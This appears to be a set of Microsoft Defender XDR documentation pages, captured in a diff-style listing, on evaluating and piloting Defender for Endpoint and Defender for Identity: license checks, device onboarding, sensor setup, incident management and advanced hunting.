-Administration Portal | Microsoft Defender portal to monitor and assist in responding to alerts of potential advanced persistent threat activity or data breaches. | [Microsoft Defender for Endpoint portal overview](/microsoft-365/security/defender-endpoint/portal-overview)
-Attack Surface Reduction | Help reduce your attack surfaces by minimizing the places where your organization is vulnerable to cyberthreats and attacks. | [Overview of attack surface reduction](/microsoft-365/security/defender-endpoint/overview-attack-surface-reduction)
-Endpoint Detection and Response | Endpoint detection and response capabilities provide advanced attack detections that are near real-time and actionable. | [Overview of endpoint detection and response capabilities](/microsoft-365/security/defender-endpoint/overview-endpoint-detection-response)
-Behavioral Blocking and Containment | Behavioral blocking and containment capabilities can help identify and stop threats, based on their behaviors and process trees even when the threat has started execution. | [Behavioral blocking and containment](/microsoft-365/security/defender-endpoint/behavioral-blocking-containment)
-Automated Investigation and Response | Automated investigation uses various inspection algorithms based on processes that are used by security analysts and designed to examine alerts and take immediate action to resolve breaches. | [Use automated investigations to investigate and remediate threats](/microsoft-365/security/defender-endpoint/automated-investigations)
-Advanced Hunting | Advanced hunting is a query-based threat-hunting tool that lets you explore up to 30 days of raw data so that you can proactively inspect events in your network to locate threat indicators and entities. | [Overview of advanced hunting](/microsoft-365/security/defender-endpoint/advanced-hunting-overview)
-Threat Analytics | Threat analytics is a set of reports from expert Microsoft security researchers covering the most relevant threats. | [Track and respond to emerging threats](/microsoft-365/security/defender-endpoint/threat-analytics)
--
-For more detailed information about the capabilities included with Microsoft Defender for Endpoint, see [What is Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint).
-
-## SIEM integration
-
-You can integrate Microsoft Defender for Endpoint with Microsoft Sentinel to more comprehensively analyze security events across your organization and build playbooks for effective and immediate response.
-
-Microsoft Defender for Endpoint can also be integrated into other Security Information and Event Management (SIEM) solutions. For more information, see [Enable SIEM integration in Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/enable-siem-integration).
--
-## Next steps
-[Enable the evaluation](eval-defender-endpoint-enable-eval.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Endpoint Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-enable-eval.md
- Title: Enable Microsoft Defender for Endpoint evaluation
-description: Enable your Microsoft Defender XDR trial lab or pilot environment, including checking license state, and onboarding endpoints
-
- - NOCSH
-- Previously updated : 09/22/2022--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Enable Microsoft Defender for Endpoint evaluation environment
--
-This article will guide you through the steps on setting up the evaluation environment for Microsoft Defender for Endpoint using production devices.
--
-> [!TIP]
-> Microsoft Defender for Endpoint also comes with an in-product evaluation lab where you can add pre-configured devices and run simulations to evaluate the capabilities of the platform. The lab comes with a simplified set-up experience that can help quickly demonstrate the value of Microsoft Defender for Endpoint including guidance for many features like advanced hunting and threat analytics. For more information, see [Evaluate capabilities](../defender-endpoint/evaluation-lab.md). <br> The main difference between the guidance provided in this article and the evaluation lab is the evaluation environment uses production devices whereas the evaluation lab uses non-production devices.
-
-Use the following steps to enable the evaluation for Microsoft Defender for Endpoint.
---- [Step 1. Check license state](#step-1-check-license-state)-- [Step 2. Onboard endpoints](#step-2-onboard-endpoints-using-any-of-the-supported-management-tools)--
-## Step 1: Check license state
-
-You'll first need to check the license state to verify that it was properly provisioned. You can do this through the admin center or through the **Microsoft Azure portal**.
--
-1. To view your licenses, go to the **Microsoft Azure portal** and navigate to the [Microsoft Azure portal license section](https://portal.azure.com/#blade/Microsoft_AAD_IAM/LicensesMenuBlade/Products).
-
- :::image type="content" source="../../media/defender/atp-licensing-azure-portal.png" alt-text="The Azure Licensing page in the Microsoft Defender portal" lightbox="../../media/defender/atp-licensing-azure-portal.png":::
-
-1. Alternately, in the admin center, navigate to **Billing** > **Subscriptions**.
-
- On the screen, you'll see all the provisioned licenses and their current **Status**.
-
- :::image type="content" source="../../media/defender/atp-billing-subscriptions.png" alt-text="The Billing licenses page in the Microsoft Azure portal" lightbox="../../media/defender/atp-billing-subscriptions.png":::
-
-
-## Step 2: Onboard endpoints using any of the supported management tools
-
-After verifying that the license state has been provisioned properly, you can start onboarding devices to the service.
-
-For the purpose of evaluating Microsoft Defender for Endpoint, we recommend choosing a couple of Windows devices to conduct the evaluation on.
-
-You can choose to use any of the supported management tools, but Intune provides optimal integration. For more information, see [Configure Microsoft Defender for Endpoint in Microsoft Intune](/mem/intune/protect/advanced-threat-protection-configure#enable-microsoft-defender-for-endpoint-in-intune).
-
-The [Plan deployment](../defender-endpoint/deployment-strategy.md) topic outlines the general steps you need to take to deploy Defender for Endpoint.
-
-Watch this video for a quick overview of the onboarding process and learn about the available tools and methods.
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bGqr]
-
-### Onboarding tool options
-
-The following table lists the available tools based on the endpoint that you need to onboard.
-
-| Endpoint | Tool options |
-|:|:|
-| **Windows** |- [Local script (up to 10 devices)](../defender-endpoint/configure-endpoints-script.md)<br/>- [Group Policy](../defender-endpoint/configure-endpoints-gp.md)<br/>- [Microsoft Intune / Mobile Device Manager](../defender-endpoint/configure-endpoints-mdm.md)<br/>- [Microsoft Endpoint Configuration Manager](../defender-endpoint/configure-endpoints-sccm.md)<br/>- [VDI scripts](../defender-endpoint/configure-endpoints-vdi.md) |
-| **macOS** | - [Local scripts](../defender-endpoint/mac-install-manually.md)<br/>- [Microsoft Intune](../defender-endpoint/mac-install-with-intune.md)<br/>- [JAMF Pro](../defender-endpoint/mac-install-with-jamf.md)<br/>- [Mobile Device Management](../defender-endpoint/mac-install-with-other-mdm.md) |
-| **iOS** | [App-based](../defender-endpoint/ios-install.md) |
-| **Android** | [Microsoft Intune](../defender-endpoint/android-intune.md) |
---
-## Next step
-[Setup the pilot for Microsoft Defender for Endpoint](eval-defender-endpoint-pilot.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Endpoint Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-overview.md
- Title: Step 4. Evaluate Microsoft Defender for Endpoint overview, including reviewing the architecture
-description: Steps for the setup of a Microsoft Defender XDR trial lab or pilot environment. Test and experience how the security solution is designed to protect devices, identity, data, and apps in your organization.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Step 4. Evaluate Microsoft Defender for Endpoint overview
-
-**Applies to:**
--- Microsoft Defender XDR-
-This article outlines the process to enable and pilot Microsoft Defender for Endpoint. Before starting this process, be sure you've reviewed the overall process for [evaluating Microsoft Defender XDR](eval-overview.md), and you've [created the Microsoft Defender XDR evaluation environment](eval-create-eval-environment.md).
-
-Use the following steps to enable and pilot Microsoft Defender for Endpoint.
--
-The following table describes the steps in the illustration.
-
-|Step|Description|
-|||
-|[Step 1. Review architecture requirements and key concepts](eval-defender-endpoint-architecture.md)|Understand the Defender for Endpoint architecture and the capabilities available to you.|
-|[Step 2. Enable the evaluation environment](eval-defender-endpoint-enable-eval.md)|Follow the steps to set up the evaluation environment.|
-|[Step 3. Set up the pilot](eval-defender-endpoint-pilot.md)|Verify your pilot group, run simulations, and become familiar with key features and dashboards.|
security Eval Defender Endpoint Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-endpoint-pilot.md
- Title: Pilot Microsoft Defender for Endpoint
-description: Learn how to run a pilot for Microsoft Defender for Endpoint, including verifying the pilot group and trying out capabilities.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Pilot Microsoft Defender for Endpoint
-
-This article will guide you in the process of running a pilot for Microsoft Defender for Endpoint.
-
-Use the following steps to setup and configure the pilot for Microsoft Defender for Endpoint.
---- Step 1. Verify pilot group-- Step 2. Try out capabilities-
-When you pilot Microsoft Defender for Endpoint, you may choose to onboard a few devices to the service before onboarding your entire organization.
-
-You can then try out capabilities that are available such as running attack simulations and seeing how Defender for Endpoint surfaces malicious activities and enables you to conduct an efficient response.
-
-## Step 1: Verify pilot group
-After completing the onboarding steps outlined in the [Enable evaluation](eval-defender-endpoint-enable-eval.md) section, you should see the devices in the Device inventory list approximately after an hour.
-
-When you see your onboarded devices you can then proceed with trying out capabilities.
-
-## Step 2: Try out capabilities
-Now that you've completed onboarding some devices and verified that they are reporting to the service, familiarize yourself with the product by trying out the powerful capabilities that are available right out of the box.
-
-During the pilot, you can easily get started with trying out some of the features to see the product in action without going through complex configuration steps.
-
-Let's start by checking out the dashboards.
-
-### View the device inventory
-The device inventory is where you'll see the list of endpoints, network devices, and IoT devices in your network. Not only does it provide you with a view of the devices in your network, but it also gives your in-depth information about them such as domain, risk level, OS platform, and other details for easy identification of devices most at risk.
-
-### View the Microsoft Defender Vulnerability Management dashboard
-Defender Vulnerability Management management helps you focus on the weaknesses that pose the most urgent and the highest risk to the organization. From the dashboard, get a high-level view of the organization exposure score, Microsoft Secure Score for Devices, device exposure distribution, top security recommendations, top vulnerable software, top remediation activities, and top exposed device data.
-
-### Run a simulation
-Microsoft Defender for Endpoint comes with ["Do It Yourself" attack scenarios](https://securitycenter.windows.com/tutorials) that you can run on your pilot devices. Each document includes OS and application requirements as well as detailed instructions that are specific to an attack scenario. These scripts are safe, documented, and easy to use. These scenarios will reflect Defender for Endpoint capabilities and walk you through investigation experience.
-
-To run any of the provided simulations, you need at least [one onboarded device](../defender-endpoint/onboard-configure.md).
-
-1. In **Help** > **Simulations & tutorials**, select which of the available attack scenarios you would like to simulate:
-
- - **Scenario 1: Document drops backdoor** - simulates delivery of a socially engineered lure document. The document launches a specially crafted backdoor that gives attackers control.
-
- - **Scenario 2: PowerShell script in fileless attack** - simulates a fileless attack that relies on PowerShell, showcasing attack surface reduction and device learning detection of malicious memory activity.
-
- - **Scenario 3: Automated incident response** - triggers automated investigation, which automatically hunts for and remediates breach artifacts to scale your incident response capacity.
-
-2. Download and read the corresponding walkthrough document provided with your selected scenario.
-
-3. Download the simulation file or copy the simulation script by navigating to **Help** > **Simulations & tutorials**. You can choose to download the file or script on the test device but it's not mandatory.
-
-4. Run the simulation file or script on the test device as instructed in the walkthrough document.
-
-> [!NOTE]
-> Simulation files or scripts mimic attack activity but are actually benign and will not harm or compromise the test device.
-
-## Next steps
-[Evaluate Microsoft Defender for Cloud Apps](eval-defender-mcas-overview.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Endpoint](eval-defender-endpoint-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Identity Architecture https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-architecture.md
- Title: Review architecture requirements and the technical framework for Microsoft Defender for Identity
-description: The technical diagram for Microsoft Defender for Identity in Microsoft Defender XDR will help you understand identity in Microsoft 365 before you build your trial lab or pilot environment.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Review architecture requirements and key concepts for Microsoft Defender for Identity
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 1 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
-
-Before enabling Microsoft Defender for Identity, be sure you understand the architecture and can meet the requirements.
-
-Microsoft Defender for Identity uses machine learning and behavioral analytics to identify attacks across your on-premises network along with detecting and proactively preventing user sign-in risks associated with cloud identities. For more information, see [What is Microsoft Defender for Identity?](/defender-for-identity/what-is)
-
-Defender for Identity protects your on-premises Active Directory users and/or users synced to your Microsoft Entra ID. To protect an environment made up of only Microsoft Entra users, see [Microsoft Entra ID Protection](/azure/active-directory/identity-protection/overview-identity-protection).
-
-## Understand the architecture
-
-The following diagram illustrates the baseline architecture for Defender for Identity.
--
-In this illustration:
--- Sensors installed on AD domain controllers parse logs and network traffic and send them to Microsoft Defender for Identity for analysis and reporting.-- Sensors can also parse Active Directory Federation Services (AD FS) when Microsoft Entra ID is configured to use federated authentication (dotted line in illustration).-- Microsoft Defender for Identity shares signals to Microsoft Defender XDR for extended detection and response (XDR).-
-Defender for Identity sensors can be directly installed on the following servers:
--- Domain controllers: The sensor directly monitors domain controller traffic, without the need for a dedicated server, or configuration of port mirroring.-- AD FS: The sensor directly monitors network traffic and authentication events.-
-For a deeper look into the architecture of Defender for Identity, including integration with Defender for Cloud Apps, see [Microsoft Defender for Identity architecture](/defender-for-identity/architecture).
-
-## Understand key concepts
-
-The following table identified key concepts that are important to understand when evaluating, configuring, and deploying Microsoft Defender for Identity.
-
-|Concept |Description |More information |
-||||
-| Monitored activities | Defender for Identity monitors signals generated from within your organization to detect suspicious or malicious activity and helps you determine the validity of each potential threat so that you can effectively triage and respond. | [Microsoft Defender for Identity monitored activities](/defender-for-identity/monitored-activities) |
-| Security alerts | Defender for Identity security alerts explain the suspicious activities detected by sensors on your network along with the actors and computers involved in each threat. | [Microsoft Defender for Identity Security Alerts](/defender-for-identity/suspicious-activity-guide?tabs=external) |
-| Entity profiles | Entity profiles provide a comprehensive deep-dive investigation of users, computers, devices, and resources along with their access history. | [Understanding entity profiles](/defender-for-identity/entity-profiles) |
-| Lateral movement paths | A key component of MDI security insights is identifying lateral movement paths in which an attacker uses non-sensitive accounts to gain access to sensitive accounts or machines throughout your network. | [Microsoft Defender for Identity Lateral Movement Paths (LMPs)](/defender-for-identity/use-case-lateral-movement-path) |
-| Network Name Resolution | Network Name Resolution (NNR) is a component of MDI functionality which captures activities based on network traffic, Windows events, ETW, etc. and correlates this raw data to the relevant computers involved in each activity. | [What is Network Name Resolution?](/defender-for-identity/nnr-policy) |
-| Reports | Defender for Identity reports allow you to schedule or immediately generate and download reports that provide system and entity status information. You can create reports about system health, security alerts, and potential lateral movement paths detected in your environment. | [Microsoft Defender for Identity Reports](/defender-for-identity/reports) |
-| Role groups | Defender for Identity offers role-based groups and delegated access to safeguard data according to your organization's specific security and compliance needs which includes Administrators, Users and Viewers. | [Microsoft Defender for Identity role groups](/defender-for-identity/role-groups) |
-| Administrative portal | In addition to the Microsoft Defender portal, the Defender for Identity portal can be used to monitor and respond to suspicious activity. | [Working with the Microsoft Defender for Identity portal](/defender-for-identity/workspace-portal) |
-| Microsoft Defender for Cloud Apps integration | Microsoft Defender for Cloud Apps integrates with Microsoft Defender for Identity to provide user entity behavioral analytics (UEBA) across a hybrid environment - both cloud app and on-premises | Microsoft Defender for Identity integration |
-
-## Review prerequisites
-
-Defender for Identity requires some prerequisite work to ensure that your on-premises identity and networking components meet minimum requirements. Use this article as a checklist to ensure your environment is ready: [Microsoft Defender for Identity prerequisites](/defender-for-identity/prerequisites).
-
-## Next steps
-
-Step 2 of 3: [Enable the evaluation environment Defender for Identity](eval-defender-identity-enable-eval.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Identity Enable Eval https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-enable-eval.md
- Title: Enable the evaluation environment for Microsoft Defender for Identity
-description: Set up Microsoft Defender for Identity in Microsoft Defender XDR trial lab or pilot environment by installing & configuring the sensor, and discovering local admins on other computers.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Enable the evaluation environment for Microsoft Defender for Identity
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 2 of 2](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
-
-Use the following steps to set up your Microsoft Defender for Identity environment.
---- [Step 1. Set up the Defender for Identity Instance](#step-1-set-up-the-defender-for-identity-instance)-- [Step 2. Install and configure the sensor](#step-2-install-and-configure-the-sensor)-- [Step 3. Configure event log and proxy settings on machines with the sensor](#step-3-configure-event-log-and-proxy-settings-on-machines-with-the-sensor)-- [Step 4. Allow Defender for Identity to identify local admins on other computers](#step-4-allow-defender-for-identity-to-identify-local-admins-on-other-computers)-
-## Step 1: Set up the Defender for Identity Instance
-
-Sign in to the Defender for Identity portal to create your instance and then connect this instance to your Active Directory environment.
-
-|Step|Description|More information|
-||||
-|1|Create the Defender for Identity instance|[Quickstart: Create your Microsoft Defender for Identity instance](/defender-for-identity/install-step1)|
-|2|Connect the Defender for Identity instance to your Active Directory forest|[Quickstart: Connect to your Active Directory Forest](/defender-for-identity/install-step2)|
-
-## Step 2: Install and configure the sensor
-
-Next, download, install, and configure the Defender for Identity sensor on the domain controllers and AD FS servers in your on-premises environment.
-
-|Step|Description|More information|
-||||
-|1|Determine how many Microsoft Defender for Identity sensors you need.|[Plan capacity for Microsoft Defender for Identity](/defender-for-identity/capacity-planning)|
-|2|Download the sensor setup package|[Quickstart: Download the Microsoft Defender for Identity sensor setup package](/defender-for-identity/install-step3)|
-|3|Install the Defender for Identity sensor|[Quickstart: Install the Microsoft Defender for Identity sensor](/defender-for-identity/install-step4)|
-|4|Configure the sensor|[Configure Microsoft Defender for Identity sensor settings](/defender-for-identity/install-step5)|
-
-## Step 3: Configure event log and proxy settings on machines with the sensor
-
-On the machines that you installed the sensor on, configure Windows event log collection and Internet proxy settings to enable and enhance detection capabilities.
-
-|Step|Description|More information|
-||||
-|1|Configure Windows event log collection|[Configure Windows Event collection](/defender-for-identity/configure-windows-event-collection)|
-|2|Configure Internet proxy settings|[Configure endpoint proxy and Internet connectivity settings for your Microsoft Defender for Identity Sensor](/defender-for-identity/configure-proxy)|
-
-## Step 4: Allow Defender for Identity to identify local admins on other computers
-
-Microsoft Defender for Identity lateral movement path detection relies on queries that identify local admins on specific machines. These queries are performed with the SAM-R protocol, using the Defender for Identity Service account.
-
-To ensure Windows clients and servers allow your Defender for Identity account to perform SAM-R, a modification to Group Policy must be made to add the Defender for Identity service account in addition to the configured accounts listed in the Network access policy. Make sure to apply group policies to all computers **except domain controllers**.
-
-For instructions on how to do this, see [Configure Microsoft Defender for Identity to make remote calls to SAM](/defender-for-identity/install-step8-samr).
-
-## Next steps
-
-Step 3 of 3: [Pilot Microsoft Defender for Identity](eval-defender-identity-pilot.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Identity](eval-defender-identity-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
security Eval Defender Identity Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-overview.md
- Title: Step 2. An Overview of Microsoft Defender XDR for Identity evaluation
-description: Use Microsoft Defender XDR for Identity in your Microsoft Defender XDR XDR solution. Steps for the evaluation of Microsoft Defender XDR for Identity including requirements, enabling or activating the eval, and set up of the pilot or test.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Step 2. Evaluate Microsoft Defender for Identity overview
--
-**Applies to:**
-- Microsoft Defender XDR-
-> [!NOTE]
-> This article is also part of the Microsoft Defender XDR XDR solution we talk about in this [Overview](eval-overview.md).
-
- Before starting the process that enables and pilots Microsoft Defender for Identity, if you intend to evaluate *Microsoft Defender XDR as an eXtended Detection and Response (XDR) solution*, make sure you've reviewed the process from the beginning: [evaluating Microsoft Defender XDR](eval-overview.md) including [created the Microsoft Defender XDR evaluation environment](eval-create-eval-environment.md).
-<br>
-
-Use the steps below to enable and pilot Microsoft Defender for Identity.
--
-This table describes the steps in the illustration.
-
-| Serial Number|Step |Description |
-||||
-|1|[Review architecture requirements and key concepts](eval-defender-identity-architecture.md) | Understand the Defender for Identity architecture and be sure your environment meets the architecture prerequisites. |
-|2|[Enable the evaluation environment](eval-defender-identity-enable-eval.md) | Follow the steps to set up the evaluation environment. |
-|3|[Set up the pilot](eval-defender-identity-pilot.md) | Learn about benchmark settings for your identity environment and try out Defender for Identity tutorials. |
security Eval Defender Identity Pilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-identity-pilot.md
- Title: Pilot Microsoft Defender for Identity
-description: Pilot Microsoft Defender for Identity, set benchmarks, take tutorials on reconnaissance, compromised credential, lateral movement, domain dominance, and exfiltration alerts, among others.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
---
-# Pilot Microsoft Defender for Identity
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 3 of 3](eval-defender-identity-overview.md) in the process of setting up the evaluation environment for Microsoft Defender for Identity. For more information about this process, see the [overview article](eval-defender-identity-overview.md).
-
-Use the following steps to set up and configure the pilot for Microsoft Defender for identity. The recommendations don't include setting up a pilot group. The best practice is to install the sensor on all of your servers running Active Directory Domain Services (AD DS) and Active Directory Federated Services (AD FS).
--
-The following table describes the steps in the illustration.
--- [Step 1: Configure benchmark recommendations for your identity environment](#step-1-configure-benchmark-recommendations-for-your-identity-environment)-- [Step 2: Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types](#step-2-try-out-capabilities--walk-through-tutorials-for-identifying-and-remediating-different-attack-types)-
-## Step 1: Configure benchmark recommendations for your identity environment
-
-Microsoft provides security benchmark recommendations for customers using Microsoft Cloud services. The [Azure Security Benchmark](/security/benchmark/azure/overview) (ASB) provides prescriptive best practices and recommendations to help improve the security of workloads, data, and services on Azure.
-
-These benchmark recommendations include [Azure security baseline for Microsoft Defender for Identity](/security/benchmark/azure/baselines/defender-for-identity-security-baseline). Implementing these recommendations can take some time to plan and implement. While these recommendations greatly increase the security of your identity environment, they shouldn't prevent you from continuing to evaluate and implement Microsoft Defender for Identity. These recommendations are provided here for your awareness.
-
-## Step 2: Try out capabilities ΓÇö Walk through tutorials for identifying and remediating different attack types
-
-The Microsoft Defender for Identity documentation includes a series of tutorials that walk through the process of identifying and remediating various attack types.
-
-Try out Defender for Identity tutorials:
--- [Reconnaissance alerts](/defender-for-identity/reconnaissance-alerts)-- [Compromised credential alerts](/defender-for-identity/compromised-credentials-alerts)-- [Lateral movement alerts](/defender-for-identity/lateral-movement-alerts)-- [Domain dominance alerts](/defender-for-identity/domain-dominance-alerts)-- [Exfiltration alerts](/defender-for-identity/exfiltration-alerts)-- [Investigate a user](/defender-for-identity/investigate-a-user)-- [Investigate a computer](/defender-for-identity/investigate-a-computer)-- [Investigate lateral movement paths](/defender-for-identity/investigate-lateral-movement-path)-- [Investigate entities](/defender-for-identity/investigate-entity)-
-## Next steps
-
-[Evaluate Microsoft Defender for Office 365.](eval-defender-office-365-overview.md)
-
-Return to the overview for [Evaluate Microsoft Defender for Office 365.](eval-defender-office-365-overview.md)
-
-Return to the overview for [Evaluate and pilot Microsoft Defender XDR](eval-overview.md)
-
security Eval Defender Investigate Respond Additional https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/eval-defender-investigate-respond-additional.md
- Title: Try Microsoft Defender XDR incident response capabilities in a pilot environment
-description: Try incident response capabilities in Microsoft Defender XDR to prioritize and manage incidents, automate investigations, and use advanced hunting in threat detection.
-
- - NOCSH
-- Previously updated : 07/09/2021--
- - m365-security
- - m365solution-scenario
- - m365solution-evalutatemtp
- - zerotrust-solution
- - highpri
- - tier1
----
-# Try Microsoft Defender XDR incident response capabilities in a pilot environment
-
-**Applies to:**
-- Microsoft Defender XDR-
-This article is [Step 2 of 2](eval-defender-investigate-respond.md) in the process of performing an investigation and response of an incident in Microsoft Defender XDR using a pilot environment. For more information about this process, see the [overview](eval-defender-investigate-respond.md) article.
-
-Once you have performed an [incident response for a simulated attack](eval-defender-investigate-respond-simulate-attack.md), here are some Microsoft Defender XDR capabilities to explore:
-
-|Capability |Description |
-|:-|:--|
-| [Prioritizing incidents](#prioritize-incidents) | Use filtering and sorting of the incidents queue to determine which incidents to address next. |
-| [Managing incidents](#manage-incidents) | Modify incident properties to ensure correct assignment, add tags and comments, and to resolve an incident. |
-| [Automated investigation and response](#examine-automated-investigation-and-response-with-the-action-center) | Use automated investigation and response (AIR) capabilities to help your security operations team address threats more efficiently and effectively. The Action center is a "single pane of glass" experience for incident and alert tasks such as approving pending remediation actions. |
-| [Advanced hunting](#use-advanced-hunting) | Use queries to proactively inspect events in your network and locate threat indicators and entities. You also use advanced hunting during the investigation and remediation of an incident. |
--
-## Prioritize incidents
-
-You get to the incident queue from **Incidents & alerts > Incidents** on the quick launch of the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>. Here's an example.
---
-The **Most recent incidents and alerts** section shows a graph of the number of alerts received and incidents created in the last 24 hours.
-
-To examine the list of incidents and prioritize their importance for assignment and investigation, you can:
--- Configure customizable columns (select **Choose columns**) to give you visibility into different characteristics of the incident or the impacted entities. This helps you make an informed decision regarding the prioritization of incidents for analysis.--- Use filtering to focus on a specific scenario or threat. Applying filters on the incident queue can help determine which incidents require immediate attention. -
-From the default incident queue, select **Filters** to see a **Filters** pane, from which you can specify a specific set of incidents. Here's an example.
--
-For more information, see [Prioritize incidents](incident-queue.md).
-
-## Manage incidents
-
-You can manage incidents from the **Manage incident** pane for an incident. Here's an example.
--
-You can display this pane from the **Manage incident** link on the:
--- Properties pane of an incident in the incident queue.-- **Summary** page of an incident.-
-Here are the ways you can manage your incidents:
--- Edit the incident name-
- Change the automatically assigned name based on your security team best practices.
-
-- Add incident tags-
- Add tags that your security team uses to classify incidents, which can be later filtered.
-
-- Assign the incident-
- Assign it to a user account name, which can be later filtered.
-
-- Resolve an incident-
- Close the incident after it has been remediated.
-
-- Set its classification and determination-
- Classify and select the threat type when you resolve an incident.
-
-- Add comments-
- Use comments for progress, notes, or other information based on your security team best practices. The full comment history is available from the **Comments and history** option in the details page of an incident.
-
-For more information, see [Manage incidents](manage-incidents.md).
-
-## Examine automated investigation and response with the Action center
-
-Depending on how automated investigation and response capabilities are configured for your organization, remediation actions are taken automatically or only upon approval by your security operations team. All actions, whether pending or completed, are listed in the [Action center](m365d-action-center.md), which lists pending and completed remediation actions for your devices, email & collaboration content, and identities in one location.
-
-Here's an example.
--
-From the Action center, you can select pending actions and then approve or reject them in the flyout pane. Here's an example.
---
-Approve (or reject) pending actions as soon as possible so that your automated investigations can proceed and complete in a timely manner.
-
-For more information, see [Automated investigation and response](m365d-autoir.md) and [Action center](m365d-action-center.md).
-
-## Use advanced hunting
-
-> [!NOTE]
-> Before we walk you through the advanced hunting simulation, watch the following video to understand advanced hunting concepts, see where you can find it in the portal, and know how it can help you in your security operations.
-
-<br>
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4Bp7O]
--
-If the [optional fileless PowerShell attack simulation](eval-defender-investigate-respond-simulate-attack.md#simulate-an-attack-with-an-isolated-domain-controller-and-client-device-optional) were a real attack that had already reached the credential access stage, you can use advanced hunting at any point in the investigation to proactively search through events and records in the network using what you already know from the generated alerts and affected entities.
-
-For instance, based on information in the [User and IP address reconnaissance (SMB)](eval-defender-investigate-respond-simulate-attack.md#alert-user-and-ip-address-reconnaissance-smb-source-microsoft-defender-for-identity) alert, you can use the `IdentityDirectoryEvents` table to find all the SMB session enumeration events, or find more discovery activities in various other protocols in Microsoft Defender for Identity data using the `IdentityQueryEvents` table.
--
-### Hunting environment requirements
-
-There's a single internal mailbox and device required for this simulation. You'll also need an external email account to send the test message.
-
-1. Verify that your tenant has [enabled Microsoft Defender XDR](m365d-enable.md#confirm-that-the-service-is-on).
-2. Identify a target mailbox to be used for receiving email.
-
- - This mailbox must be monitored by Microsoft Defender for Office 365
-
- - The device from requirement 3 needs to access this mailbox
-
-3. Configure a test device:
-
- a. Make sure you are using Windows 10 version 1903 or later version.
-
- b. Join the test device to the test domain.
-
- c. [Turn on Microsoft Defender Antivirus](/windows/security/threat-protection/windows-defender-antivirus/configure-windows-defender-antivirus-features). If you are having trouble enabling Microsoft Defender Antivirus, see [this troubleshooting topic](/windows/security/threat-protection/microsoft-defender-atp/troubleshoot-onboarding#ensure-that-microsoft-defender-antivirus-is-not-disabled-by-a-policy).
-
- d. [Onboard to Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/configure-endpoints).
-
-### Run the simulation
-
-1. From an external email account, send an email to the mailbox identified in step 2 of the hunting environment requirements section. Include an attachment that will be allowed through any existing email filter policies. This file does not need to be malicious or an executable. Suggested file types are <i>.pdf</i>, <i>.exe</i> (if allowed), or an Office document type such as a Word file.
-
-2. Open the sent email from the device configured as defined in step 3 of the hunting environment requirements section. Either open the attachment or save the file to the device.
-
-#### Go hunting
-
-1. Open the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-2. From the navigation pane, select **Hunting > Advanced hunting**.
-
-3. Build a query that starts by gathering email events.
-
- 1. Select **Query > New**.
-
- 1. In the **Email** groups under **Advanced hunting**, double-click **EmailEvents**. You should see this in the query window.
-
- ```console
- EmailEvents
- ```
-
